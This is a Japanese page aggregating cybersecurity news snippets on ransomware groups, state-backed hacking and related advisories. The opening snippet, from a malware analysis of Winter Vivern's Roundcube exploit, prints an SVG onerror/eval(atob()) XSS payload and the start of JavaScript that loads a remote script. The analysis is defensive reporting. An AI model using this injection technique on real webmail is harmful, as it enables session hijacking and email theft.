Roundcube Webmailサーバーのゼロデイ脆弱性を悪用したWinter Vivernの攻撃 | サイバーセキュリティ情報局
useタグのhref属性でbase64エンコードされた値を復号したところ、次のようになりました。 <svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg> href属性のx値の引数が有効なURLでないため、このオブジェクトのonerror属性が有効になります。onerror属性のペイロードを復号すると、以下のJavaScriptコード(悪意のあるURLは手動で変更しています)が得られました。このJavaScriptコードは、被害者のブラウザでRoundcubeセッションの権限で実行されます。 var fe=document.createElement('script');fe.src="https://re
企業のデータを盗んだサイバー犯罪集団が被害企業を「データの盗難を公表しなかった」と証券取引委員会に告発
「Alphv」あるいは「BlackCat」という名前で知られるランサムウェアグループが、金融機関・消費者向けのデータ企業であるMeridianLinkの顧客データと運用情報を盗み出し、身代金を要求しました。さらに、MeridianLinkがランサムウェアにデータを乗っ取られた事実を公表しなかったとして、アメリカ証券取引委員会(SEC)に苦情を申し立てました。 Ransomware Group Files SEC Complaint Over Victim's Failure to Disclose Data Breach - SecurityWeek https://www.securityweek.com/ransomware-group-files-sec-complaint-over-victims-failure-to-disclose-data-breach/ AlphV fil
名古屋港をハッキングしたとみられる「LockBit」が今度はボーイングをハッキングし50GB分のデータを流出させたと発表
2023年10月にボーイングをハッキングしたランサムウェア集団「LockBit」が、ボーイングからの身代金支払いがなかったとして約50GB分の機密データをオンラインフォーラムで公開しました。 LockBit leaks Boeing files after failed ransom negotiations • The Register https://www.theregister.com/2023/11/10/lockbit_leaks_boeing_files/ Boeing breach: LockBit leaks 50 GB of data | Cybernews https://cybernews.com/news/boeing-data-leak-lockbit-ransomware/ 2023年10月28日、航空宇宙機器開発のボーイングがLockBitにハッキングを受け
サイバー攻撃グループEarth Hundun(BlackTech)の活動傾向と攻撃手法の解説|トレンドマイクロ
オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら
諜報活動が世界のサイバー攻撃を助長 - News Center Japan
*詳細データについてはレポートをご参照ください。 離散民族コミュニティへのフォーカスを強めるロシアと中国 ロシアも中国も、さまざまな離散民族コミュニティに対する影響工作を拡大しています。ロシアは、世界のウクライナ人コミュニティを威嚇し、さまざまな国、特にポーランドやバルト三国の戦争難民と受け入れ側のコミュニティの間に不信感を植え付けることを目指しています。それに対して中国は、秘密のプロパガンダを広めるために、数十のプラットフォームにわたって連携したアカウントの大規模なネットワークを展開しています。そこでは、世界の中国語圏などのコミュニティを直接ターゲットにして、米国の政府機関を誹謗中傷し、何百人もの多言語インフルエンサーを通じて中国のポジティブなイメージを宣伝しています。 影響工作とサイバー攻撃の融合 国家支援アクターが、自分の望むプロパガンダを広めるために、サイバー作戦と並行して影響工作
無秩序なサイバー攻撃組織「Scattered Spider」に注意--クラウドストライク
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 米セキュリティ企業のCrowdStrikeは、「Scattered Spider」と呼ばれるサイバー攻撃組織への警戒を呼び掛けている。アジア太平洋地域では、日本とオーストラリアの組織が狙われているといい、無秩序な攻撃活動が特徴だという。 CrowdStrike Counter Adversary Operations担当責任者のAdam Meyers氏によると、Scattered Spiderの攻撃活動は2022年3月ごろから世界的に拡大している。同氏は、ZDNET Japanの取材に「これまでに52以上の組織での被害を確認しており、アジア太平洋地域は日本とオーストラリアが標的にされ、オーストラリアでは金融とメディア、日本では航空宇宙と
「DarkGate」による攻撃、ベトナムのサイバー犯罪グループが関与--ウィズセキュア調査
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます フィンランドに拠点を置くセキュリティ企業WithSecureの日本法人ウィズセキュアは10月24日、リモートアクセスのトロイの木馬(RAT)「DarkGate」の攻撃を追跡し、ベトナムを拠点に活動するサイバー攻撃グループが関与しているとのリサーチ結果を発表した。 DarkGateは、多様なユーザーベースと機能を備えているRAT。少なくとも2018年にはサイバー攻撃に使用され始めており、現在はサービスとしてのマルウェア(MaaS)として複数のサイバー犯罪グループに供給され、情報窃取、クリプトジャッキング、ランサムウェアの攻撃キャンペーンで観測されているという。 WithSecureは、英国、米国、インドの企業・団体へのDarkGateを使
日本とアメリカの当局が「中国政府のハッカーによってCisco製ルーターなどのネットワークにバックドアが仕掛けられている」と警告
アメリカの連邦捜査局(FBI)、国家安全保障局(NSA)、サイバーセキュリティ・社会基盤安全保障庁(CISA)および日本の内閣サイバーセキュリティセンター(NISC)と警察庁が合同で、中国政府により支援されているハッカー集団「BlackTech(ブラックテック)」によるサイバー攻撃についての注意喚起を発表しました。 People's Republic of China-Linked Cyber Actors Hide in Router Firmware | CISA https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a 中国を背景とするサイバー攻撃グループ BlackTech によるサイバー攻撃について(注意喚起) (PDFファイル)https://www.nisc.go.jp/pdf/press/2023
カプコンに不正アクセス攻撃を仕掛けたRagnarLockerのダークウェブポータルを日本・アメリカ・EUの法執行機関が押収
世界有数の海運会社にランサムウェア攻撃を仕掛けたり、カプコンに不正アクセス攻撃を仕掛けたりしたことで有名なランサムウェアグループが「RagnarLocker」です。そんなRagnarLockerが使用してきたダークウェブ上にあるウェブサイトを、日本・アメリカ・欧州連合(EU)の法執行機関が押収したことが、海外メディアTechCrunchの調査により明らかになりました。 RagnarLocker ransomware dark web site seized in international sting | TechCrunch https://techcrunch.com/2023/10/19/ragnarlocker-ransomware-dark-web-portal-seized-in-international-sting/ Ragnar Locker ransomware’s d
中国のハッカー集団がMicrosoft Outlookのアメリカ国務省アカウントに不正アクセスし約6万通のメールを盗んだことが発覚
2023年7月に中国のハッカー集団がアメリカの政府組織のメールアカウントに不正アクセスしていたことが報じられました。新たに、アメリカ国務省がエリック・シュミット上院議員らの質問に答える形で「中国のハッキンググループによって国務省のメールアカウント10件が侵害され、6万通のメールが盗み出された」という大規模な被害を明らかにしました。 Chinese hackers stole 60,000 emails from senior State Department officials in May, source says | CNN Politics https://edition.cnn.com/2023/09/28/politics/china-hackers-state-department-emails-senate-briefing/index.html 2023年7月にMicros
警戒高まる中国のサイバー攻撃 その狙いは? 米サイバーセキュリティ機関は名指しで非難
米国務省などの電子メールを狙った不正アクセスの被害が7月に発覚した。米ワシントンポストの報道によると、8月には日本でも機密防衛ネットワークが不正侵入を受けていたという。米政府などは、いずれも中国のハッカー集団が関与していたとして警戒を強めている。 米国務省や商務省の電子メールシステムに侵入していたのは「Storm-0558」と呼ばれる組織。米Microsoftはその正体について「“ある程度の確信を持って”中国を拠点とするスパイ目的のハッカー集団だ」と推測している。その根拠は、Storm-0558の活動時間が中国の一般的な勤務時間(月~金曜の午前8時~午後5時)と一致していることなどだ。 Storm-0558は主に米欧の政府機関や台湾、新疆ウイグル自治区とつながる人物などを標的にしているとみられ、狙った組織の環境やポリシーなどを詳しく把握した上で攻撃を仕掛ける。Storm-0558は高度な技
7月のランサムウェア攻撃、前年比154%増--「Cl0p」グループの暗躍で
2023年7月のランサムウェア攻撃件数は、「Cl0p」ランサムウェアグループが「MOVEit」ソフトウェアに潜んでいたゼロデイ脆弱性を悪用するキャンペーンを展開したこともあり、過去最高を記録した。 NCC Groupのグローバル脅威インテリジェンスチームが新たに公開したレポートによると、ランサムウェアを用いたサイバー攻撃による重大インシデント数は、7月に502件と過去最高を記録した。この値は2022年7月の198件と比較すると154%増に相当するという。 また、2023年7月の件数は同年6月の434件と比較すると16%増となっている。 NCC Groupはこの件数の多さについて、Cl0pグループの活動によるところが大きいとしている。Cl0pは「MOVEit」ソフトウェアの脆弱性に対する攻撃で悪名をはせているサイバー犯罪者グループだ。 Cl0pグループとは Lace Tempestグループと
ランサムウェア被害者の知られざるストーリーの解明
大企業に対するランサムウェア攻撃が見出しを占めることがよくあります。Kaseya、コロニアルパイプライン、MOVEitのような組織に対する知名度の高い攻撃は、ランサムウェアのギャングが狙うのは大企業だけだと思わせるかもしれません。私たちの調査によると、ここれが常に当てはまるわけではありません。 大規模な組織だけが危険にさらされていると考えていると、攻撃を受ける可能性を過小評価することになりかねません。最近のランサムウェアインシデントの分析を利用して、あなたの組織が他のランサムウェア被害者と類似していることを確認し、攻撃が発生する前にサイバーセキュリティのギャップを埋めることができるようにしましょう。 私たちの調査とランサムウェア攻撃の構造について詳しくは 、南北アメリカで8月23日、EMEAとAPACで8月24日に開催されたRansomware Detection and Response
北朝鮮のハッカーが盗み出した約60億円相当のビットコインを現金化しようとしているとFBIが警告
「Lazarus Group」または「APT38」として知られる北朝鮮のハッカー集団「TraderTraitor」が2022年に盗んだ数億ドル(数百億円)分のビットコインのうち、4000万ドル(約58億円)以上のビットコインを換金しようとしているとアメリカ連邦捜査局(FBI)が仮想通貨会社に対して警告しています。 FBI Identifies Cryptocurrency Funds Stolen by DPRK — FBI https://www.fbi.gov/news/press-releases/fbi-identifies-cryptocurrency-funds-stolen-by-dprk FBI Identifies Cryptocurrency Funds Stolen by DPRKhttps://t.co/QmkwMQtmUn— FBI (@FBI) August 2
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
【セキュリティ ニュース】日米当局、中国が関与するサイバー攻撃について注意喚起(1ページ目 / 全2ページ):Security NEXT
Lazarus Group が ManageEngine の脆弱性を悪用して QuiteRAT を展開 - Cisco Japan Blog
【セキュリティ ニュース】Android狙うマルウェア「Infamous Chisel」 - 海外当局がロシア関与と分析(1ページ目 / 全1ページ):Security NEXT
カスタマイズ版の Yashma ランサムウェアを使用する新たな攻撃者が登場、ブルガリア、中国、ベトナムなどが標的に - Cisco Japan Blog
コードの流出により、新たなランサムウェア攻撃グループが急増 - Cisco Japan Blog
「日本の重要インフラに影響を及ぼした」〜名古屋港へのランサムウェア攻撃をトレンドマイクロが解説 
